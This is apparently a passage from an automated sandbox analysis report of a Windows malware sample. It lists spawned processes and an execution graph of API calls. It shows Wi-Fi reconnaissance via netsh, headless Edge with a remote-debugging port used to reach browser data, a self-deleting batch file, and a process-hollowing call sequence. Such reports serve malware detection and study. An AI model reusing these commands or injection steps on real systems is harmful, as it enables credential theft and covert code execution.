                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                                                                  Start time:04:59:07
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-logging --mojo-platform-channel-handle=2052 --field-trial-handle=2016,i,4566184230407132723,17088106052091521409,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                                                                  Start time:04:59:09
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                  Commandline:"cmd.exe" /c /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                                                                  Start time:04:59:09
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                                                                  Start time:04:59:16
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                                                                  Start time:04:59:16
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2120 --field-trial-handle=2020,i,1680887362715709972,4906417747234883006,262144 --disable-features=PaintHolding /prefetch:3
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                                                                  Start time:04:59:16
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging --noerrdialogs --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                                                                                  Start time:04:59:16
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2196 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:3
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                                                                                  Start time:04:59:20
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6436 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                                                                  Start time:04:59:20
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6760 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff67dcd0000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                                                                  Start time:04:59:20
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7baa00000
                                                                                                                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                                                                                  Start time:04:59:20
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7baa00000
                                                                                                                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                                                                                  Start time:04:59:27
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tmp305C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp305C.tmp.bat"
                                                                                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                                                                                  Start time:04:59:27
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                                                                                  Start time:04:59:27
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                  Commandline:chcp 65001
                                                                                                                                                                                                                                                                                                                  Imagebase:0xb70000
                                                                                                                                                                                                                                                                                                                  File size:12'800 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                                                                                                  Start time:04:59:27
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                  Commandline:TaskKill /F /PID 7536
                                                                                                                                                                                                                                                                                                                  Imagebase:0x170000
                                                                                                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                                                                                                  Start time:04:59:27
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                  Commandline:Timeout /T 2 /Nobreak
                                                                                                                                                                                                                                                                                                                  Imagebase:0x60000
                                                                                                                                                                                                                                                                                                                  File size:25'088 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                                                                                                  Start time:05:00:16
                                                                                                                                                                                                                                                                                                                  Start date:09/01/2025
                                                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6800 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff71e800000
                                                                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                                    Execution Coverage:12.3%
                                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                    Signature Coverage:8.6%
                                                                                                                                                                                                                                                                                                                    Total number of Nodes:245
                                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:7
                                                                                                                                                                                                                                                                                                                    execution_graph 40870 7c365d3 40871 7c365e6 40870->40871 40875 7c36880 40871->40875 40879 7c368a8 40871->40879 40872 7c36609 40876 7c36884 40875->40876 40876->40872 40877 7c368af PostMessageW 40876->40877 40878 7c36914 40877->40878 40878->40872 40880 7c368ab PostMessageW 40879->40880 40882 7c36914 40880->40882 40882->40872 40883 7c36210 40884 7c36213 40883->40884 40887 7c302dc 40884->40887 40888 7c302e7 40887->40888 40889 7c36447 GetCurrentThreadId 40888->40889 40890 7c3625b 40888->40890 40889->40890 40949 7c31eb0 40950 7c31eb3 40949->40950 40954 7c31f33 40950->40954 40983 7c31f40 40950->40983 40951 7c31ed1 40955 7c31f75 40954->40955 40957 7c325b8 40954->40957 40955->40957 41012 777ad04 40955->41012 41016 777ad10 40955->41016 40956 7c320bc 40956->40957 40973 7779e01 Wow64SetThreadContext 40956->40973 40974 7779e08 Wow64SetThreadContext 40956->40974 40957->40951 40958 7c32128 40958->40957 40981 777a230 VirtualAllocEx 40958->40981 40982 777a238 VirtualAllocEx 40958->40982 40959 7c3221b 40960 7c32250 40959->40960 40967 7c31f33 10 API calls 40959->40967 40968 7c31f40 10 API calls 40959->40968 40960->40957 40977 777a090 WriteProcessMemory 40960->40977 40978 777a088 WriteProcessMemory 40960->40978 40961 7c32441 40961->40957 40969 777a090 WriteProcessMemory 40961->40969 40970 777a088 WriteProcessMemory 40961->40970 40962 7c322fb 40962->40957 40962->40961 40979 777a090 WriteProcessMemory 40962->40979 40980 777a088 WriteProcessMemory 40962->40980 40963 7c32513 40963->40957 40965 7779e01 Wow64SetThreadContext 40963->40965 40966 7779e08 Wow64SetThreadContext 40963->40966 40964 7c325aa 40964->40957 40971 777a2f0 ResumeThread 40964->40971 40972 777a2f8 ResumeThread 40964->40972 40965->40964 40966->40964 40967->40960 40968->40960 40969->40963 40970->40963 40971->40964 40972->40964 40973->40958 40974->40958 40977->40962 40978->40962 40979->40962 40980->40962 40981->40959 40982->40959 40984 7c31f75 40983->40984 40986 7c325b8 40983->40986 40984->40986 41002 777ad04 CreateProcessA 40984->41002 41003 777ad10 CreateProcessA 40984->41003 40985 7c320bc 40985->40986 41020 7779e08 40985->41020 41024 7779e01 40985->41024 40986->40951 40987 7c32128 40987->40986 41028 777a238 40987->41028 41032 777a230 40987->41032 40988 7c3221b 40989 7c32250 40988->40989 40994 7c31f33 10 API calls 40988->40994 40995 7c31f40 10 API calls 40988->40995 40989->40986 41036 777a090 40989->41036 41040 777a088 40989->41040 40990 7c32441 40990->40986 40996 777a090 WriteProcessMemory 40990->40996 40997 777a088 WriteProcessMemory 40990->40997 40991 7c322fb 40991->40986 40991->40990 41006 777a090 WriteProcessMemory 40991->41006 41007 777a088 WriteProcessMemory 40991->41007 40992 7c32513 40992->40986 41010 7779e01 Wow64SetThreadContext 40992->41010 41011 7779e08 Wow64SetThreadContext 40992->41011 40993 7c325aa 40993->40986 41045 777a2f8 40993->41045 41049 777a2f0 40993->41049 40994->40989 40995->40989 40996->40992 40997->40992 41002->40985 41003->40985 41006->40991 41007->40991 41010->40993 41011->40993 41013 777ad08 CreateProcessA 41012->41013 41015 777af5c 41013->41015 41017 777ad99 CreateProcessA 41016->41017 41019 777af5c 41017->41019 41021 7779e0b Wow64SetThreadContext 41020->41021 41023 7779e95 41021->41023 41023->40987 41025 7779e04 Wow64SetThreadContext 41024->41025 41027 7779e95 41025->41027 41027->40987 41029 777a23b VirtualAllocEx 41028->41029 41031 777a2b5 41029->41031 41031->40988 41033 777a234 VirtualAllocEx 41032->41033 41035 777a2b5 41033->41035 41035->40988 41037 777a093 WriteProcessMemory 41036->41037 41039 777a12f 41037->41039 41039->40991 41041 777a08c 41040->41041 41042 777a0fe WriteProcessMemory 41041->41042 41044 777a013 41041->41044 41043 777a12f 41042->41043 41043->40991 41044->40991 41046 777a2fb ResumeThread 41045->41046 41048 777a369 41046->41048 41048->40993 41050 777a2f4 ResumeThread 41049->41050 41052 777a369 41050->41052 41052->40993 41053 a860570 41054 a860584 41053->41054 41059 a8606a0 41054->41059 41062 a8606c8 41054->41062 41065 a860710 41054->41065 41055 a860656 41061 a860710 6 API calls 41059->41061 41060 a8606d6 41060->41055 41061->41060 41063 a8606d6 41062->41063 41064 a860710 6 API calls 41062->41064 41063->41055 41064->41063 41066 a8606be 41065->41066 41067 a86071e 41065->41067 41068 a8606d6 41066->41068 41070 a860710 6 API calls 41066->41070 41069 a860797 41067->41069 41073 a860880 41067->41073 41077 a860871 41067->41077 41068->41055 41069->41055 41070->41068 41075 a86088f 41073->41075 41074 a8608fb 41074->41069 41075->41074 41081 7c35e40 41075->41081 41079 a86088f 41077->41079 41078 a8608fb 41078->41069 41079->41078 41080 7c35e40 6 API calls 41079->41080 41080->41078 41085 7c35e60 41081->41085 41097 7c35e70 41081->41097 41082 7c35e5a 41082->41074 41087 7c35e64 41085->41087 41086 7c35f13 41087->41086 41088 7c35f0b 41087->41088 41089 7c35f18 GetCurrentThreadId 41087->41089 41109 7c302b0 41088->41109 41091 7c35f46 41089->41091 41092 7c35f7d 41091->41092 41113 7c3ed68 41091->41113 41118 7c3ed59 41091->41118 41123 7c3ed7a 41091->41123 41128 7c3ed8a 41091->41128 41098 7c35ecd 41097->41098 41099 7c35f13 41098->41099 41100 7c35f0b 41098->41100 41101 7c35f18 GetCurrentThreadId 41098->41101 41102 7c302b0 PostThreadMessageW 41100->41102 41103 7c35f46 41101->41103 41102->41099 41104 7c35f7d 41103->41104 41105 7c3ed8a 3 API calls 41103->41105 41106 7c3ed7a 3 API calls 41103->41106 41107 7c3ed59 3 API calls 41103->41107 41108 7c3ed68 3 API calls 41103->41108 41105->41104 41106->41104 41107->41104 41108->41104 41110 7c302bb PostThreadMessageW 41109->41110 41112 7c361db 41110->41112 41112->41086 41115 7c3ed87 41113->41115 41114 7c3edbb 41114->41092 41133 a8613c8 41115->41133 41139 a8613d8 41115->41139 41119 7c3ed87 41118->41119 41121 a8613c8 2 API calls 41119->41121 41122 a8613d8 2 API calls 41119->41122 41120 7c3edbb 41120->41092 41121->41120 41122->41120 41127 7c3ed87 41123->41127 41124 7c3edbb 41124->41092 41125 a8613c8 2 API calls 41125->41124 41126 a8613d8 2 API calls 41126->41124 41127->41125 41127->41126 41129 7c3ed96 41128->41129 41131 a8613c8 2 API calls 41129->41131 41132 a8613d8 2 API calls 41129->41132 41130 7c3edbb 41130->41092 41131->41130 41132->41130 41134 a861427 GetCurrentThreadId 41133->41134 41136 a86146d 41134->41136 41145 a860414 41136->41145 41140 a861427 GetCurrentThreadId 41139->41140 41142 a86146d 41140->41142 41143 a860414 EnumThreadWindows 41142->41143 41144 a8614a8 41143->41144 41144->41114 41146 a8614c8 EnumThreadWindows 41145->41146 41148 a8614a8 41146->41148 41148->41114 40856 2f7a2b0 40860 2f7a3a8 40856->40860 40865 2f7a398 40856->40865 40857 2f7a2bf 40861 2f7a3dc 40860->40861 40862 2f7a3b9 40860->40862 40861->40857 40862->40861 40863 2f7a5e0 GetModuleHandleW 40862->40863 40864 2f7a60d 40863->40864 40864->40857 40866 2f7a3dc 40865->40866 40868 2f7a3b9 40865->40868 40866->40857 40867 2f7a5e0 GetModuleHandleW 40869 2f7a60d 40867->40869 40868->40866 40868->40867 40869->40857 40947 2f7cc90 DuplicateHandle 40948 2f7cd26 40947->40948 41149 2f7c640 41150 2f7c686 GetCurrentProcess 41149->41150 41152 2f7c6d1 41150->41152 41153 2f7c6d8 GetCurrentThread 41150->41153 41152->41153 41154 2f7c715 GetCurrentProcess 41153->41154 41155 2f7c70e 41153->41155 41156 2f7c74b 41154->41156 41155->41154 41157 2f7c773 GetCurrentThreadId 41156->41157 41158 2f7c7a4 41157->41158 41159 7c35d38 41160 7c35d3b 41159->41160 41162 7c35e40 6 API calls 41160->41162 41161 7c35d63 41162->41161 40891 2f74528 40892 2f74536 40891->40892 40895 2f740f0 40892->40895 40894 2f7453f 40896 2f740fb 40895->40896 40899 2f73ce8 40896->40899 40898 2f7456e 40898->40894 40900 2f73cf3 40899->40900 40903 2f7438c 40900->40903 40902 2f74645 40902->40898 40904 2f74397 40903->40904 40907 2f743bc 40904->40907 40906 2f74722 40906->40902 40908 2f743c7 40907->40908 40911 2f743ec 40908->40911 40910 2f74834 40910->40906 40913 2f743f7 40911->40913 40912 2f77881 40912->40910 40913->40912 40915 2f7c368 40913->40915 40916 2f7c399 40915->40916 40917 2f7c3bd 40916->40917 40920 2f7c517 40916->40920 40924 2f7c528 40916->40924 40917->40912 40921 2f7c528 40920->40921 40922 2f7c56f 40921->40922 40928 2f7b0d0 40921->40928 40922->40917 40925 2f7c535 40924->40925 40926 2f7c56f 40925->40926 40927 2f7b0d0 2 API calls 40925->40927 40926->40917 40927->40926 40929 2f7b0db 40928->40929 40931 2f7d288 40929->40931 40932 2f7c8d4 40929->40932 40931->40931 40933 2f7c8df 40932->40933 40934 2f743ec 2 API calls 40933->40934 40935 2f7d2f7 40934->40935 40936 2f7d306 40935->40936 40939 2f7d360 40935->40939 40943 2f7d370 40935->40943 40936->40931 40940 2f7d39e 40939->40940 40941 2f7d46f 40940->40941 40942 2f7d46a KiUserCallbackDispatcher 40940->40942 40941->40941 40942->40941 40945 2f7d39e 40943->40945 40944 2f7d46f 40945->40944 40946 2f7d46a KiUserCallbackDispatcher 40945->40946 40946->40944
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1816310121.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
